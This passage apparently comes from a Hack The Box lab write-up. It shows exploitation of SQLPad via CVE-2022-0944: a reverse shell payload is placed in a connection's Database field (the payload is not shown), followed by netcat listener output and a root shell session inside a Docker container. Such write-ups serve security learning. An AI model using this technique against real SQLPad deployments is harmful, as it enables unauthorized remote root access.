CVE-2022-0944
The target SQLPad instance is vulnerable to [[Sightless_CVE-2022-0944#[CVE-2022-0944](https //nvd.nist.gov/vuln/detail/CVE-2022-0944)|CVE-2022-0944]]
Adding a new connection
Creating a new connection, CVE-2022-0944, with a reverse shell payload in the Database field
┌──(kali㉿kali)-[~/archive/htb/labs/sightless]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.15.34] from (UNKNOWN) [10.129.206.178] 48384
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad# whoami
whoami
root
root@c184118df0a6:/var/lib/sqlpad# hostname
hostname
c184118df0a6
root@c184118df0a6:/var/lib/sqlpad# ip a
ip a
bash: ip: command not found
root@c184118df0a6:/var/lib/sqlpad# ifconfig
ifconfig
bash: ifconfig: command not found
root@c184118df0a6:/var/lib/sqlpad# cat /sys/class/net/eth0/address
cat /sys/class/net/eth0/address
02:42:ac:11:00:02Initial Foothold established to a Docker host, c184118df0a6, as the root user